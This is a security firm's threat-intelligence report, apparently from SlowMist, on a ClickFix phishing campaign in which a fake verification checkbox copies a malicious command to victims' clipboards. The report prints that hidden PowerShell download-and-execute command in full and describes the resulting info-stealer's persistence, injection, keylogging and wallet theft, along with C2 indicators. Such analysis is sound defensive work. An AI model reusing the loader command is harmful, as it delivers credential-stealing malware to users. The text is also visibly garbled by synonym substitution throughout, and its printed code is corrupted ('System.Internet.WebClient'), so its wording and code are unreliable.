Threat Intelligence: Clickfix Phishing Attack

When victims click on the checkbox to begin the verification, the phishing website silently copies a malicious command into their clipboard. Victims are then prompted to press particular keys, which triggers the obtain and execution of the malware.

The frontend code exhibits that this system listens for postMessage occasions from iframes or dad or mum/youngster home windows. As soon as it receives the message turnstileSuccess, it calls the operate copyTextSilently().

In index_1.html, the code displays the checkbox. As soon as the sufferer interacts with it, the web page sends a turnstileSuccess message to the dad or mum web page.

Clipboard Injection of Malicious Instructions

Within the copyTextSilently() operate:

  • If the Clipboard API circumstances are met, it immediately calls Clipboard#writeText() to repeat the malicious command.
  • In any other case, it creates a hidden <textarea> aspect, inserts the command, makes use of execCommand() to repeat it, and eventually removes the aspect.

The code references command_win from the worldwide window object, which is outlined within the exterior script belongings/command.js.

Inside command.js, window.command_win is outlined to obtain a malicious script from a distant server and execute it stealthily through PowerShell:

powershell -w h -c "
$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';
$p='$env:USERPROFILEMusicd.ps1';
(New-Object System.Internet.WebClient).DownloadFile($u,$p);
powershell -w h -ep bypass -f $p"

Clicking the VERIFY button additionally triggers copyTextSilently(). Nevertheless, as a consequence of browser safety restrictions, victims should click on once more on the web page after urgent VERIFY for the malicious command to be copied efficiently.

Evaluation of the Malicious Script

The malicious PowerShell script processes an array $mmASoSdDL by becoming a member of it right into a string, decoding it from Base64, and changing it right into a JSON object.

Hidden Listing Creation

The script checks if a goal listing exists. If not, it creates one and units its attributes to Hidden and System.

Writing Malicious Recordsdata

The script iterates over the recordsdata array within the JSON, constructs full paths, decodes Base64-encoded binary knowledge, and writes them into the hidden listing.

Persistence through Auto-Startup

A shortcut named trntl.lnk is created within the sufferer’s Startup folder, pointing to trntl.exe. The shortcut makes use of a system icon for disguise, guaranteeing the malware executes mechanically at login or startup.

Delayed Execution

The script generates a short lived .cmd file with a random identify, which makes use of rundll32 to launch the .exe. After a 60-second delay, the script executes it through cmd.exe /c, and deletes the .cmd file afterward to erase traces.

Malicious Script Code

Under are the primary parts of the malicious script (the unique code was a single steady block; line breaks have been added for readability).

Dynamic Evaluation

The malicious executable was uploaded to VirusTotal, the place it was flagged as malware.

(https://www.virustotal.com/gui/file/cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039/detection)

Course of Injection

The malware injects code right into a reputable course of (regasm.exe), modifying its execution stream in order that the benign course of runs malicious payloads.

Delicate Knowledge Assortment

Sandbox evaluation signifies the malware reveals typical info-stealing habits, together with:

  • Extracting delicate knowledge from browsers (Chrome, Chromium, Opera, and so on.), equivalent to cookies, saved passwords, and crypto wallets.
  • Concentrating on electronic mail shoppers (Thunderbird, Home windows Mail) to steal accounts and messages.
  • Finding crypto pockets recordsdata to steal non-public keys or pockets knowledge.
  • Extracting FTP credentials.

Keylogging

The malware features a keylogger to seize keystrokes in actual time, together with usernames and passwords.

C2 Communication

The malware retrieves its C2 configuration from Pastebin and establishes communication with the malicious IP 217[.]12[.]204[.]47:9000/443. This enables exfiltration of stolen knowledge and reception of instructions.

  • Malicious Pastebin URL: https[:]//pastebin[.]com/uncooked/rzARed3W
  • IP & URL already flagged as malicious on VirusTotal, with IP geolocated to Greece.
https://www.virustotal.com/gui/ip-address/217.12.204.47
https://www.virustotal.com/gui/url/225eceb2f02ba20308d77ac250e85e43fa927b4d51edb5aa3290679fe17ee72d

Conclusion

This phishing assault leverages social engineering methods — tricking customers into executing malicious instructions, in the end resulting in malware set up. Victims who unknowingly run these instructions threat theft of delicate knowledge, together with crypto pockets non-public keys.

The SlowMist safety staff urges builders and customers to stay vigilant when encountering unfamiliar instructions. If debugging or command execution is critical, it ought to solely be carried out in remoted environments with out delicate knowledge.

IoCs

IPs

  • 217[.]12[.]204[.]47

SHA256

  • 4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 — aTu.lim
  • cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 — trntl.exe
  • 60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 — command.js

URLs

  • https[:]//pastebin[.]com:443/uncooked/rzARed3W
  • 217[.]12[.]204[.]47:443
  • 217[.]12[.]204[.]47:9000
  • http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
  • http[:]//electri[.]billregulator[.]com/aTu.lim

About SlowMist

SlowMist is a blockchain safety agency established in January 2018. The agency was began by a staff with over ten years of community safety expertise to turn into a world power. Our objective is to make the blockchain ecosystem as safe as attainable for everybody. We at the moment are a famend worldwide blockchain safety agency that has labored on varied well-known initiatives equivalent to HashKey Trade, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, and so on.

SlowMist affords quite a lot of providers that embrace however are usually not restricted to safety audits, menace info, protection deployment, safety consultants, and different security-related providers. We additionally provide AML (Anti-money laundering) software program, MistEye (Safety Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Sensible contract firewall) and different SaaS merchandise. We now have partnerships with home and worldwide companies equivalent to Akamai, BitDefender, RC², TianJi Companions, IPIP, and so on. Our intensive work in cryptocurrency crime investigations has been cited by worldwide organizations and authorities our bodies, together with the United Nations Safety Council and the United Nations Workplace on Medicine and Crime.

By delivering a complete safety answer personalized to particular person initiatives, we will establish dangers and forestall them from occurring. Our staff was capable of finding and publish a number of high-risk blockchain safety flaws. By doing so, we may unfold consciousness and lift the safety requirements within the blockchain ecosystem.

Similar Posts